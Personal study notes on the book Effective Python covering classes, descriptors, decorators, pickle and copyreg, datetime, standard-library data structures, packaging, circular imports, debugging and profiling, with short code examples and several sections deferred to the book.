Use Multiple Inheritance Only for Mix-in Utility Classes#

Python makes multiple inheritance possible and tractable, but it is better to avoid it altogether. If you want the encapsulation and convenience of multiple inheritance, use a mix-in instead. A mix-in is a small utility class that only defines a set of additional methods a class should provide. Mix-in classes don't define their own instance attributes and don't require their __init__ constructor to be called.

Example: you want the ability to convert a Python object from its in-memory representation to a dictionary ready for serialisation.
```python
class ToDictMixin(object):
    def to_dict(self):
        return self._traverse_dict(self.__dict__)

    def _traverse_dict(self, instance_dict):
        output = {}
        for key, value in instance_dict.items():
            output[key] = self._traverse(key, value)
        return output

    def _traverse(self, key, value):
        if isinstance(value, ToDictMixin):
            return value.to_dict()
        elif isinstance(value, dict):
            return self._traverse_dict(value)
        elif isinstance(value, list):
            return [self._traverse(key, i) for i in value]
        elif hasattr(value, '__dict__'):
            return self._traverse_dict(value.__dict__)
        else:
            return value
```

Using it:

```python
class BinaryTree(ToDictMixin):
    def __init__(self, value, left=None, right=None):
        self.value = value
        self.left = left
        self.right = right

tree = BinaryTree(10,
                  left=BinaryTree(7, right=BinaryTree(9)),
                  right=BinaryTree(13, left=BinaryTree(11)))
print(tree.to_dict())
```

The mix-in methods can also be overridden. A lot more to read on this in the book…

Prefer Public Attributes over Private Ones#

In Python there are only two attribute visibility types: private and public.

```python
class MyObject(object):
    def __init__(self):
        self.public_field = 5
        self.__private_field = 10

    def get_private_field(self):
        return self.__private_field
```

Public attributes can be accessed with dot notation:

```python
my_obj = MyObject()
print(my_obj.public_field)
```

Private fields start with a double underscore __ and can be accessed by methods of the containing class.
```python
print(my_obj.get_private_field())
```

Directly accessing a private attribute gives an error:

```python
print(my_obj.__private_field)

>>> AttributeError: 'MyObject' object has no attribute '__private_field'
```

• Class methods can access private attributes because they are declared within the class block
• A subclass cannot access its parent class's private fields

The Python compiler just does a check on the calling class name, therefore this works:

```python
class MyChildObject(MyObject):
    pass

print(my_child_obj.get_private_field())

>>> 10
```

but if MyChildObject itself held the get_private_field() method, it would fail. If you look at the __dict__ of an object you can see the mangled parent attributes:

```python
(Pdb) my_child_obj.__dict__
{'public_field': 5, '_MyObject__private_field': 10}
```

and accessing them is easy:

```python
print(my_child_obj._MyObject__private_field)
```

Why isn't visibility restricted? The Python motto: "We are all consenting adults here." The benefits of being open outweigh the downsides of being closed.

To minimise the damage of accessing internals unknowingly, follow the PEP 8 naming conventions. Fields prefixed with a single underscore (_protected_field) are protected, meaning external users of the class should proceed with caution.

By choosing private fields you make subclass overrides and extensions cumbersome and brittle, and those private references will break when the hierarchy changes. It is better to allow subclasses to do more by using _protected attributes; make sure to document their importance and which ones should be treated as immutable.

Inherit from collections.abc for Custom Container Types#

Much of Python is defining classes, their data and how they relate. Every Python class is a container of some kind. Often when creating a sequence you will inherit from list. But what about a binary tree that you want to allow indexing for, which isn't a list but is similar?
```python
class BinaryNode(object):
    def __init__(self, value, left=None, right=None):
        self.value = value
        self.left = left
        self.right = right
```

You can access an item with obj.__getitem__(0), i.e. obj[0]:

```python
class IndexableNode(BinaryNode):
    def _search(self, count, index):
        # ...
        # Returns (found, count)

    def __getitem__(self, index):
        found, _ = self._search(0, index)
        if not found:
            raise IndexError('Index out of range')
        return found.value
```

But then you would also need implementations of __len__, count and index. Instead, use an abstract base class from collections:

```python
from collections.abc import Sequence
```

Once you implement __getitem__ and __len__, the other methods come for free.

• You can still inherit directly from Python's container types list and dict for simple cases

Metaclasses and Attributes#

Metaclasses let you intercept Python's class statement to provide special behaviour each time a class is defined. Remember to follow the rule of least surprise.

Use Plain Attributes Instead of Get and Set Methods#

Getter and setter methods can be written in Python and may be seen as good to:

• encapsulate functionality
• validate usage
• define boundaries

In Python, you never need to start with them. Always begin with simple public attributes. If you later need special behaviour, you can use @property and the setter decorator, which also helps to add validation and type checking:

```python
class BoundedResistance(Resistor):
    def __init__(self, ohms):
        super().__init__(ohms)

    @property
    def ohms(self):
        return self._ohms

    @ohms.setter
    def ohms(self, ohms):
        if ohms <= 0:
            raise ValueError('%f ohms must be > 0' % ohms)
        self._ohms = ohms
```

Don't set other attributes in getter property methods; only modify related object state in setters. If you are doing something slow and complex, rather do it in a normal method: people expect a property to behave like simple attribute access.
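The BoundedResistance snippet above subclasses a Resistor base class that isn't shown in these notes. A minimal sketch of it (assuming the book's simple version) makes the example runnable, and shows that the assignment in Resistor.__init__ already goes through the subclass's property setter:

```python
class Resistor(object):
    def __init__(self, ohms):
        # On a BoundedResistance instance, this assignment
        # invokes the property setter defined on the subclass
        self.ohms = ohms

class BoundedResistance(Resistor):
    def __init__(self, ohms):
        super().__init__(ohms)

    @property
    def ohms(self):
        return self._ohms

    @ohms.setter
    def ohms(self, ohms):
        if ohms <= 0:
            raise ValueError('%f ohms must be > 0' % ohms)
        self._ohms = ohms

r = BoundedResistance(1000)
r.ohms = 500    # validated on every assignment
try:
    r.ohms = 0  # rejected by the setter
except ValueError:
    pass
```

Note that even construction is validated: BoundedResistance(-5) raises ValueError, because __init__ assigns through the same setter.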
Consider @property Instead of Refactoring Attributes#

"One advanced but common use of @property is transitioning what was once a simple numerical attribute into an on-the-fly calculation." Check the book for a good example…

• Use @property to give existing instance attributes new functionality
• Make incremental progress towards better data models
• Consider refactoring a class when you find yourself reaching for @property too regularly

Use Descriptors for Reusable @property Methods#

The big problem with @property is reuse: the methods it decorates cannot be reused for multiple attributes in the same class, or by external classes. Take the example:

```python
class Exam(object):
    def __init__(self):
        self._writing_grade = 0
        self._math_grade = 0

    @staticmethod
    def _check_grade(value):
        if not (0 <= value <= 100):
            raise ValueError('Grade must be between 0 and 100')

    @property
    def writing_grade(self):
        return self._writing_grade

    @writing_grade.setter
    def writing_grade(self, value):
        self._check_grade(value)
        self._writing_grade = value

    @property
    def math_grade(self):
        return self._math_grade

    @math_grade.setter
    def math_grade(self, value):
        self._check_grade(value)
        self._math_grade = value
```

We are duplicating the properties and the grade validation. The better way is to use a descriptor, which describes how attribute access is interpreted by the language.

• Provide __get__ and __set__ methods to reuse the grade validation behaviour
• They are better than mix-ins at this because you can reuse the same logic for many attributes in the same class

The class implementing the descriptor:

```python
class Grade(object):
    def __get__(*args, **kwargs):
        # ...

    def __set__(*args, **kwargs):
        # ...
```
The exam:

class Exam(object):
    # Class attributes
    math_grade = Grade()
    writing_grade = Grade()
    science_grade = Grade()

Assigning properties:

exam = Exam()
exam.writing_grade = 40

# Which is really
Exam.__dict__['writing_grade'].__set__(exam, 40)

Retrieving properties:

print(exam.writing_grade)

# Which is really
print(Exam.__dict__['writing_grade'].__get__(exam, Exam))

In short, when an Exam instance doesn't have an attribute named writing_grade, Python will fall back to the Exam class's attribute instead. If this class attribute is an object that has __get__ and __set__ methods, Python will assume you want to follow the descriptor protocol.

There are still many gotchas here you can go through in the book…

Use __getattr__, __getattribute__, and __setattr__ for Lazy Attributes#

Read the book…

Validate Subclasses with Metaclasses#

•	Use metaclasses to ensure that subclasses are well formed at the time they are defined, before objects of their type are constructed.
•	The __new__ method of metaclasses is run after the class statement's entire body has been processed.

Register Class Existence with Metaclasses#

Hectic topic…read the book

Annotate Class Attributes with Metaclasses#

Again…hectic

Concurrency and Parallelism#

Concurrency is when a computer does many different things seemingly at the same time: interleaving execution of a program makes it seem like it is all being done at the same time.

Parallelism is actually doing many different things at the same time.

Concurrency provides no speedup for the total work.
These topics are a bit too hectic for now… you are welcome to read the book…I will leave the headings here

Use subprocess to Manage Child Processes#

Read full details in the book…

Use Threads for Blocking I/O, Avoid Parallelism#

Read full details in the book…

Use Lock to Prevent Data Races in Threads#

Read full details in the book…

Use Queue to Coordinate Work between Threads#

Read full details in the book…

Consider Coroutines to Run Many Functions Concurrently#

Read full details in the book…

Consider concurrent.futures for True Parallelism#

Read full details in the book…Item 41

Built-in Modules#

Python takes a batteries-included approach to the standard library. Some of these built-in modules are so closely intertwined with idiomatic python that they may as well be part of the language specification.

Define Function Decorators with functools.wraps#

Decorators have the ability to run additional code before or after any calls to the function they wrap. This allows them to access and modify input arguments and return values.

Say you want to print arguments and return values for a recursive function call:

def trace(func):
    '''Decorator to display input arguments and return value'''
    def wrapper(*args, **kwargs):
        result = func(*args, **kwargs)
        print(f'{func.__name__}({args},{kwargs}) -> {result}')
        return result
    return wrapper

You can apply this function with the @ symbol:

@trace
def fibonacci(n):
    '''Return the n-th fibonacci number'''
    if n in (0, 1):
        return 1
    return fibonacci(n-1) + fibonacci(n-2)

The @ symbol is equivalent to calling:

fibonacci = trace(fibonacci)

Testing it:

result = fibonacci(3)
print(result)

gives:

fibonacci((1,),{}) -> 1
fibonacci((0,),{}) -> 1
fibonacci((2,),{}) -> 2
fibonacci((1,),{}) -> 1
fibonacci((3,),{}) -> 3
3

There is however an unintended side effect: the function returned does not think it is called fibonacci.

print(fibonacci)

<function trace.<locals>.wrapper at 0x108a0fbf8>

The trace function returns the wrapper it defines.
The wrapper function is what is assigned to the fibonacci name by the decorator. The problem is that this undermines debuggers and object serialisers.

For example the help is useless:

>>> from test import fibonacci
>>> help(fibonacci)
Help on function wrapper in module test:

wrapper(*args, **kwargs)

The solution is to use the wraps helper function from the functools built-in module. This is a decorator that helps you write decorators. Applying it to wrapper copies the important metadata about the inner function to the outer function. The important part below is @wraps(func):

from functools import wraps

def trace(func):
    '''Decorator to display input arguments and return value'''
    @wraps(func)
    def wrapper(*args, **kwargs):
        result = func(*args, **kwargs)
        ...

Now help() works well:

In [1]: from test import fibonacci
In [2]: help(fibonacci)
Help on function fibonacci in module test:

fibonacci(n)
    Return the n-th fibonacci number

Consider contextlib and with Statements for Reusable try/finally Behaviour#

The with statement in python is used to indicate when code is running in a special context.

lock = Lock()
with lock:
    print('Lock is held')

is equivalent to:

lock.acquire()
try:
    print('Lock is held')
finally:
    lock.release()

The with statement is better as it eliminates the need to write repetitive code.

It's easy to make your objects and functions capable of use in with statements by using the contextlib built-in module. This module contains the contextmanager decorator, which lets a simple function be used in with statements. This is much easier than defining a new class with the special methods __enter__ and __exit__ (the standard way).

There is more information in the book…Item 43

Make pickle Reliable with copyreg#

The pickle built-in module can serialize python objects into a stream of bytes and deserialise them back into python objects. Pickle byte streams shouldn't be used to communicate between untrusted parties.
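A small sketch of the contextmanager decorator mentioned above (managed_resource is a made-up name): everything before the yield runs on entry to the with block, everything after it runs on exit, and the try/finally guarantees cleanup even if the block raises.

```python
from contextlib import contextmanager

events = []

@contextmanager
def managed_resource(name):
    # Hypothetical resource; markers make the entry/exit order visible
    events.append('acquire')
    try:
        yield name
    finally:
        events.append('release')

with managed_resource('lock') as r:
    events.append(f'use {r}')

print(events)  # ['acquire', 'use lock', 'release']
```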
The purpose of pickle is to communicate between two programs you control over binary channels.

The pickle module's serialization format is unsafe by design. The serialized data contains what is essentially a program that describes how to reconstruct the original Python object. This means a malicious pickle payload could be used to compromise any part of the Python program that attempts to deserialize it.

In contrast, the json module is safe by design. Serialized JSON data contains a simple description of an object hierarchy. Deserializing JSON data does not expose a Python program to any additional risk. Formats like JSON should be used for communication between programs or people that don't trust each other.

Say you have a class tracking the state of a game for a player:

class GameState(object):
    '''Track the state of your game'''
    def __init__(self):
        self.level = 0
        self.lives = 4

You use and save the state of a player:

state = GameState()
state.level += 1
state.lives -= 1

state_path = '/tmp/game_state.bin'
with open(state_path, 'wb') as f:
    pickle.dump(state, f)

You can later resume the game state with:

state_path = '/tmp/game_state.bin'
with open(state_path, 'rb') as f:
    state_after = pickle.load(f)
print(state_after.__dict__)

But what if you add a new field to the state class? Serialising and deserialising a GameState instance will work, but resuming the old state will not have the points attribute, even though the instance is of the GameState type.

Fixing these issues requires copyreg.

Default attribute values#

You can set default attribute values:

def __init__(self, lives=4, level=0, points=0):
    ...

To use this constructor for pickling, create a helper function that takes a GameState object and turns it into a tuple of parameters for the copyreg module.
The returned tuple contains the function and parameters to use when unpickling:

def pickle_game_state(game_state):
    kwargs = game_state.__dict__
    return unpickle_game_state, (kwargs,)

Now I need unpickle_game_state, which takes the serialised data and parameters and returns a GameState object:

def unpickle_game_state(kwargs):
    return GameState(**kwargs)

Now register them with copyreg:

import copyreg, pickle

copyreg.pickle(GameState, pickle_game_state)

Unfortunately this worked for new objects, but did not work for me when deserialising the old saved pickle file. The unpickle_game_state function was not run.

There is more info in the book on versioning of classes and providing stable import paths…

Use datetime Instead of Local Clocks#

UTC (Coordinated Universal Time) is the standard timezone-independent representation of time. It is good for computers but not great for humans, as they need a reference point.

Use datetime with the help of pytz for conversions. The old time module should be avoided.

The time module#

The localtime function from the time built-in module lets you convert unix time (seconds since the epoch) to the local time of the host computer.

from time import localtime, mktime, strftime, strptime

now = 1407694710
local_tuple = localtime(now)
time_format = '%Y-%m-%d %H:%M:%S'
time_str = strftime(time_format, local_tuple)
print(time_str)

time_tuple = strptime(time_str, time_format)
utc_now = mktime(time_tuple)
print(utc_now)

>>> 2014-08-10 20:18:30
>>> 1407694710.0

The problem comes when converting time to other timezones. The time module uses the host platform/operating system, and this has different formats and missing timezones.
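An end-to-end sketch of the copyreg registration described above, in one file. Note that registration only affects pickles written afterwards, which is consistent with the failure on the old saved file mentioned here; old pickles still reconstruct the object directly, bypassing the constructor.

```python
import copyreg
import pickle

class GameState(object):
    # Defaults mean fields added later (e.g. points) get filled in
    # when an old pickle is rebuilt through the constructor.
    def __init__(self, lives=4, level=0, points=0):
        self.lives = lives
        self.level = level
        self.points = points

def pickle_game_state(game_state):
    kwargs = game_state.__dict__
    return unpickle_game_state, (kwargs,)

def unpickle_game_state(kwargs):
    return GameState(**kwargs)

copyreg.pickle(GameState, pickle_game_state)

state = GameState()
state.level += 1
data = pickle.dumps(state)        # routed through pickle_game_state
state_after = pickle.loads(data)  # rebuilt via the constructor
print(state_after.level, state_after.points)  # 1 0
```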
If you must use time, only use it for converting unix time to the local pc time; in all other cases use datetime.

The datetime module#

You can use datetime to convert a time to your local timezone:

now = datetime.datetime(2014, 8, 10, 18, 18, 30)
now_utc = now.replace(tzinfo=datetime.timezone.utc)
now_local = now_utc.astimezone()
print(now_local)

datetime lets you change timezones, but it does not hold the definitions of the rules for the timezones. Enter pytz.

pytz holds the timezone information of every timezone you might need.

To use pytz effectively, always convert first to UTC and then to the target timezone.

Top tip, you can get all timezones with:

pytz.all_timezones

In this example I convert a sydney flight arrival time into utc (note all these calls are required):

import datetime
import pytz

time_format = '%Y-%m-%d %H:%M:%S'
arrival_sydney = '2014-05-01 05:33:24'
sydney_dt_naive = datetime.datetime.strptime(arrival_sydney, time_format)
sydney = pytz.timezone('Australia/Sydney')
sydney_dt = sydney.localize(sydney_dt_naive)
utc_dt = pytz.utc.normalize(sydney_dt.astimezone(pytz.utc))
print(utc_dt)

>>> 2014-04-30 19:33:24+00:00

Now I can convert that UTC time to Johannesburg time:

jhb_timezone = pytz.timezone('Africa/Johannesburg')
jhb_dt = jhb_timezone.normalize(utc_dt.astimezone(jhb_timezone))
print(jhb_dt)

>>> 2014-04-30 21:33:24+02:00

Use Built-in Algorithms and Data Structures#

When implementing programs with non-trivial amounts of data, eventually you see slowdowns, most likely because you are not using the most suitable algorithms and data structures. On top of speed, these algorithms also make life easier.

Double Ended Queue#

The deque class from the collections module is a double ended queue. Ideal for a FIFO (first in, first out) queue:

from collections import deque

fifo = deque()
fifo.append(1)
x = fifo.popleft()

list also contains a sequence of items; you can insert or remove items from the end in constant time.
Inserting and removing items from the head of a list takes linear time O(n), but constant time O(1) for a deque.

Ordered Dictionary#

Standard dictionaries are unordered, meaning the same dict can have different orders of iteration. The OrderedDict class from the collections module is a special type of dictionary that keeps track of the order in which keys were inserted. Iterating through it has predictable behaviour.

a = OrderedDict()
a['one'] = 1
a['two'] = 2

b = OrderedDict()
b['one'] = 'red'
b['two'] = 'blue'

for number, colour in zip(a.values(), b.values()):
    print(number, colour)

Default Dictionary#

Useful for bookkeeping and tracking statistics. With dictionaries you cannot assume a key is present, making it awkward to increase a counter for example:

stats = {}
key = 'my_counter'
if key not in stats:
    stats[key] = 0
stats[key] += 1

defaultdict automatically stores a default value when a key does not exist; all you need to do is provide a function that produces the default. In this case int() == 0:

from collections import defaultdict

stats = defaultdict(int)
stats['my_counter'] += 1

Heap Queue#

Heaps are useful for maintaining a priority queue. The heapq module provides functions for creating heaps in standard list types with functions like heappush, heappop and nsmallest.

Remember items are always removed with highest priority first (lowest number):

a = []
heapq.heappush(a, 5)
heapq.heappush(a, 3)
heapq.heappush(a, 7)
heapq.heappush(a, 4)
print(
    heapq.heappop(a), heapq.heappop(a),
    heapq.heappop(a), heapq.heappop(a)
)

Accessing the list with a[0] always returns the smallest item:

assert a[0] == nsmallest(1, a)[0] == 3

Calling the sort method on the list maintains the heap invariant.

print('Before:', a)
a.sort()
print('After: ', a)

>>>
Before: [3, 4, 7, 5]
After:  [3, 4, 5, 7]

These operations take linear time on a plain list, but logarithmic time on a heap.

Bisection#

Searching for an item in a list takes linear time proportional to its length when you call the index method.
The bisect module's function bisect_left provides an efficient binary search through a sequence of sorted items. The value it returns is the insertion point of the value into the sequence.

x = list(range(10**6))
i = x.index(991234)

i = bisect_left(x, 991234)

The binary search is logarithmic.

Iterator Tools#

itertools contains a large number of functions for organising and interacting with iterators. There are 3 main categories:

1. Linking iterators together
	*	chain - combines multiple iterators into a single sequential iterator
	*	cycle - repeats an iterator's items forever
	*	tee - splits a single iterator into multiple parallel iterators
	*	zip_longest - zip for iterators of differing lengths
2. Filtering
	*	islice - slices an iterator by numerical indexes without copying
	*	takewhile - returns items from an iterator while a predicate condition is true
	*	dropwhile - skips items from an iterator until a predicate returns False for the first time, then returns the rest
	*	filterfalse - returns items from an iterator when a predicate function returns False
3. Combinations
	*	product - returns the cartesian product of items from an iterator
	*	permutations - returns ordered permutations of length N with items from an iterator
	*	combinations - returns unordered combinations of length N with unrepeated items from an iterator

Use decimal When Precision Is Paramount#

rate = 1.45
seconds = 3*60 + 42
cost = rate * seconds / 60
print(cost)
print(round(cost, 2))

With floating point math and rounding down you get:

5.364999999999999
5.36

This won't do. The Decimal class provides 28 decimal places of fixed point math by default. It gives you more precision and control over rounding.
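A few of the itertools functions listed above, demonstrated on small inputs so the behaviour is easy to check (the values are arbitrary examples, not from the book):

```python
from itertools import chain, islice, dropwhile

# chain: combine multiple iterators into one sequential iterator
combined = list(chain([1, 2], [3, 4]))                 # [1, 2, 3, 4]

# islice: slice an iterator by index without copying the whole thing
window = list(islice(range(10), 2, 6))                 # [2, 3, 4, 5]

# dropwhile: skip items while the predicate holds, then yield the rest
tail = list(dropwhile(lambda x: x < 3, [1, 2, 3, 1]))  # [3, 1]

print(combined, window, tail)
```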
from decimal import Decimal, ROUND_UP

rate = Decimal('1.45')
seconds = Decimal('222')  # 3*60 + 42
cost = rate * seconds / Decimal('60')
print(cost)

rounded = cost.quantize(Decimal('0.01'), rounding=ROUND_UP)
print(rounded)

Gives:

5.365
5.37

Using the quantize method this way also properly handles the edge case of short, cheap phone calls: it still returns 0 if the cost is zero, but 0.01 if it is 0.000000000001.

Know Where to Find Community-Built Modules#

Python has a central repository of modules called PyPI that is maintained by the community.

Collaboration#

There are language features in python to help you construct well defined API's with clear interface boundaries. The python community has established best practices that maximise maintainability over time. You need to be deliberate in your collaboration goals.

Write Docstrings for Every Function, Class and Module#

Documentation is very important due to the dynamic nature of the language. Unlike other languages, the documentation from source is available when a program runs.

You can add documentation immediately after the def statement of a function:

def palindrome(word):
    '''Return True if the given word is a palindrome'''
    return word == word[::-1]

You can retrieve the docstring with:

print(repr(palindrome.__doc__))

Consequences:

•	Makes interactive development easier with ipython and using the help function
•	A standard way of defining documentation makes it easier to build tools that convert it into more appealing formats like html: like sphinx or readthedocs
•	First class, accessible and good looking documentation encourages people to write it

Documenting Modules#

Each module should have a top level docstring.
#!/usr/bin/env python3
'''Single sentence describing the module's purpose

The paragraphs that follow should contain details that all
users should know about

It is a good place to highlight important features:
- Usage information for command line utilities
'''

Documenting Classes#

Each class should have a docstring highlighting public attributes and methods, along with guidance on interacting with protected attributes etc. eg.

class Player(object):
    """Represents a player of the game.

    Subclasses may override the 'tick' method to provide
    custom animations for the player's movement depending
    on their power level, etc.

    Public attributes:
    - power: Unused power-ups (float between 0 and 1).
    - coins: Coins found during the level (integer).
    """

Documenting Functions#

Every public method and function should have a docstring, similar to other docstrings, with arguments documented at the end. eg.

def find_anagrams(word, dictionary):
    """Find all anagrams for a word.

    This function only runs as fast as the test for
    membership in the 'dictionary' container. It will
    be slow if the dictionary is a list and fast if
    it's a set.

    Args:
        word: String of the target word.
        dictionary: Container with all strings that
            are known to be actual words.

    Returns:
        List of anagrams that were found. Empty if
        none were found.
    """

•	If your function has no arguments and a simple return value, a single sentence description is probably good enough.
•	If your function uses *args and **kwargs, use documentation to describe their purpose.
•	Default values should be mentioned
•	Generators should describe what the generator yields

Use Packages to Organise Modules and Provide Stable APIs#

As the size of a codebase grows, it is natural to reorganise its structure into smaller modules. You may find yourself with so many modules that another layer is needed.
For that python provides packages, which are modules containing other modules.

In most cases packages are created by putting a __init__.py file into a directory. Once that is present you can import modules from that package:

main.py
mypackage/__init__.py
mypackage/models.py
mypackage/utils.py

in main.py:

from mypackage import utils

Namespaces#

Packages let you divide modules into separate namespaces.

from analysis.utils import inspect as analysis_inspect
from frontend.utils import inspect as frontend_inspect

When functions have the same name you can import them under different names. Even better is to avoid the as altogether and access the function the package.module.function way.

Stable API#

Python lets you provide a strict, stable API for external consumers. You will want to provide stable functionality that does not change between releases. Say you want all functions in my_module.utils and my_module.models to be accessible via my_module. You can add a __init__.py:

__all__ = []

from .models import *
__all__ += models.__all__

from .utils import *
__all__ += utils.__all__

in utils.py:

from .models import Projectile

__all__ = ['simulate_collision']
...

in models.py:

__all__ = ['Projectile']

class Projectile:
    ...

Try to avoid using import *, as it can overwrite names existing in your module and it hides the source of names from new readers.

Define a Root Exception to Insulate Callers from APIs#

Python has a built-in hierarchy of exceptions for the language and standard library. There's a draw to using the built-in exception types for reporting errors instead of defining your own new types. Sometimes raising a ValueError makes sense, but it is much more powerful for an API to define its own hierarchy of exceptions.
# my_module.py
class Error(Exception):
    """Base-class for all exceptions raised by this module."""

class InvalidDensityError(Error):
    """There was a problem with a provided density value."""

Having a root exception lets consumers of your API catch exceptions you raise on purpose. eg: we are specifically catching the my_module.Error:

try:
    weight = my_module.determine_weight(1, -1)
except my_module.Error as e:
    logging.error('Unexpected error: %s', e)

These root exceptions:

•	Let callers know there is a problem with their usage of the API
•	If an exception is not caught properly it will propagate all the way up to an except, bringing attention to the consumer (catching the Python Exception base class can help you find bugs)
•	They help find bugs in your API code - other (non-root) exceptions are ones you did not intend to raise
•	Future-proof the API when expanding it:

class NegativeDensityError(InvalidDensityError):
    """A provided density value was negative."""
    ...

The calling code will still work as it catches the parent InvalidDensityError.

Know How to Break Circular Dependencies#

When collaborating with others you will eventually have a mutual interdependency between modules.

You have a dialog module, importing app:

import app

class Dialog(object):
    def __init__(self, save_dir):
        self.save_dir = save_dir
    # ...

save_dialog = Dialog(app.prefs.get('save_dir'))

def show():
    # ...

The app module contains a prefs object and also imports the dialog class:

import dialog

class Prefs(object):
    # ...
    def get(self, name):
        # ...

prefs = Prefs()
dialog.show()

This is a circular dependency: if you try to use the app module you will get:

AttributeError: 'module' object has no attribute 'prefs'

So how does python's import work? In depth-first order, Python:

1. Searches for your module in sys.path
2. Loads the code and ensures it compiles
3. Creates a corresponding empty module object
4. Inserts the module into sys.modules
5. Runs the code in the module object to define its contents

The attributes of a module aren't defined until the code runs in step 5, but a module can be imported immediately after it is inserted into sys.modules.

The app module imports dialog. The dialog module imports app. app.prefs raises the error because app is just an empty shell at this point.

The best way to fix this is to ensure that prefs is at the bottom of the dependency tree. Here are 3 approaches to breaking the circular dependency:

Reordering Imports#

Import dialog at the bottom of app:

class Prefs(object):
    # ...

prefs = Prefs()

import dialog  # Moved
dialog.show()

This will avoid the AttributeError, but it goes against PEP8.

Import, Configure, Run#

Have modules minimise side effects at import time: have modules only define functions, classes and constants, and avoid running any functions at import time. Then each module provides a configure function to be run once all other modules have finished importing.

dialog.py:

import app

class Dialog(object):
    # ...

app.py:

import dialog

class Prefs(object):
    # ...

prefs = Prefs()

def configure():
    # ...

main.py:

import app
import dialog

app.configure()
dialog.configure()

dialog.show()

Your main.py should:

1. Import
2. Configure
3. Run

This can make your code harder to read but allows for the dependency injection design pattern.

Dynamic Import#

The simplest fix is to use an import statement inside a function: a dynamic import, as the importing is done while the program is running.

dialog.py:

class Dialog(object):
    # ...

save_dialog = Dialog()

def show():
    import app  # Dynamic import

It requires no structural changes to the way modules are defined and imported. There are downsides: the cost can be bad, especially inside loops, and by delaying execution there may be surprising failures at runtime.
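A self-contained sketch of the dynamic-import pattern, using a stdlib module (fractions) to stand in for the app module from the example above, since a real two-module cycle can't be shown in one file. The import inside the function is resolved only when the function runs, and subsequent calls hit the sys.modules cache rather than re-importing.

```python
import sys

def show():
    # Dynamic import: resolved when show() runs, not at module load time,
    # which is what breaks the import-time cycle in the dialog/app example.
    import fractions
    return fractions.Fraction(1, 3) + fractions.Fraction(1, 6)

print(show())  # 1/2
print('fractions' in sys.modules)  # True: cached after the first call
```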
Use Virtual Environments for Isolated and Reproducible Dependencies#

Potentially use pipenv in this case…

Production#

Consider Module-scoped Code to Configure Deployment Environments#

When putting things into production you have to rely on database configurations, and these can be handled by your module; take a test versus a production database, for example. You can override parts of your program at startup time to provide different functionality:

dev_main.py:

TESTING = True

import db_connection
db = db_connection.Database()

prod_main.py:

TESTING = False

import db_connection
db = db_connection.Database()

The only difference is the value of TESTING. Then in your code you can decide which db to use:

db_connection.py:

import __main__

class TestingDatabase(object):
    # ...

class RealDatabase(object):
    # ...

if __main__.TESTING:
    Database = TestingDatabase
else:
    Database = RealDatabase

Once your deployment environments get complicated, you should consider moving them out of Python constants (like TESTING) and into dedicated configuration files. Tools like the configparser built-in module let you maintain production configurations separate from code, a distinction that's crucial for collaborating with an operations team.

Another example: if you know your program works differently based on the host platform, you can inspect the sys module.

db_connection.py:

import sys

class Win32Database(object):
    # ...

class PosixDatabase(object):
    # ...

if sys.platform.startswith('win32'):
    Database = Win32Database
else:
    Database = PosixDatabase

You can also get environment variables with:

os.environ

Use repr Strings for Debugging Output#

print will get you surprisingly far when debugging. The problem is that these human readable results don't show the type.

>>> print('5')
5
>>> print(5)
5

You always want to see the repr version, which is the printable representation of an object.
>>> print(repr('5'))
'5'
>>> print(repr(5))
5

The repr of a class is not particularly helpful, although if you have control of the class you can define your own __repr__ method to display the object:

class BetterClass(object):
    def __init__(self, x, y):
        # ...

    def __repr__(self):
        return 'BetterClass(%d, %d)' % (self.x, self.y)

When you don't have control over the class you can check the object's instance dictionary with obj.__dict__

Test Everything with unittest#

So many people don't do this (you should start with the test).

•	Python doesn't have static type checking, so the compiler doesn't stop the program when types are wrong.
•	You don't know whether functions will be defined at runtime.

This is seen as a blessing by most python devs because of the productivity gained from brevity and simplicity. But type safety isn't everything and code needs to be tested. You should always test your code no matter what language it is written in. In python the only way to have any confidence in your code is to write tests; there is no veil of static type checking to make you feel safe.

Tests are easy to write in python thanks to the same dynamic features, like easily overridable behaviours. Tests are insurance, giving you confidence your code is correct and guarding future modification and refactoring against breaking functionality.

The simplest way to write a test is by using unittest.

See more on writing Unit Tests

For more advanced testing libraries see pytest and nose

Consider Interactive Debugging with pdb#

Everyone encounters bugs. Writing tests isolates code but does not help you find the root cause of issues. You should use python's built-in interactive debugger.

Other programming languages make you put a breakpoint on a certain line. The python debugger differs in that you directly initiate the debugger in the code. All you need to do is add import pdb; pdb.set_trace() where you want to stop:

def complex_func(a, b, c):
    # ...
    import pdb; pdb.set_trace()

As soon as the statement runs, execution is paused and you can inspect local variables. You can use locals, help and import.

Inspecting current state:

•	bt - print the traceback of the current execution stack
•	up - move the scope up, to the caller of the current function
•	down - move the scope down one level in the call stack

Resuming execution:

•	step - run the program until the next line, stopping in the next function called
•	next - run the next line, do not stop when the next function is called
•	return - run the program until the current function returns
•	continue - continue running until the next breakpoint

Profile Before Optimising#

Slowdowns can be obscure. The best thing to do is ignore intuition and directly measure the performance of a program before you try to optimise it. Python provides a built-in profiler. Let's try it on this insertion sort:

from random import randint

max_size = 10**4
data = [randint(0, max_size) for _ in range(max_size)]
test = lambda: insertion_sort(data)

def insertion_sort(data):
    result = []
    for value in data:
        insert_value(result, value)
    return result

def insert_value(array, value):
    for i, existing in enumerate(array):
        if existing > value:
            array.insert(i, value)
            return
    array.append(value)

Python provides profile in pure python and cProfile, a C-extension with low overhead. Ensure you only profile the portion of the code you have control over, not external systems.
import cProfile
from pstats import Stats

profiler = cProfile.Profile()
profiler.runcall(test)

stats = Stats(profiler)
stats.strip_dirs()
stats.sort_stats('cumulative')
stats.print_stats()

Results:

$ python test.py
20003 function calls in 2.167 seconds

Ordered by: cumulative time

ncalls tottime percall cumtime percall filename:lineno(function)
1 0.000 0.000 2.167 2.167 test.py:198(<lambda>)
1 0.004 0.004 2.167 2.167 test.py:181(insertion_sort)
10000 2.142 0.000 2.163 0.000 test.py:188(insert_value)
9988 0.020 0.000 0.020 0.000 {method 'insert' of 'list' objects}
12 0.000 0.000 0.000 0.000 {method 'append' of 'list' objects}
1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects}

•	ncalls - number of calls to the function during the profiling period
•	tottime - number of seconds spent executing the function (not other functions it calls)
•	percall - average time in seconds spent in the function per call
•	cumtime - cumulative seconds spent in the function, including other calls it makes
•	cumtime percall - average seconds spent per call, including other calls

You can see the time spent in insert_value is the biggest time waster:

from bisect import bisect_left

def insert_value(array, value):
    i = bisect_left(array, value)
    array.insert(i, value)

Now the results:

30003 function calls in 0.067 seconds

Ordered by: cumulative time

ncalls tottime percall cumtime percall filename:lineno(function)
1 0.000 0.000 0.067 0.067 test.py:196(<lambda>)
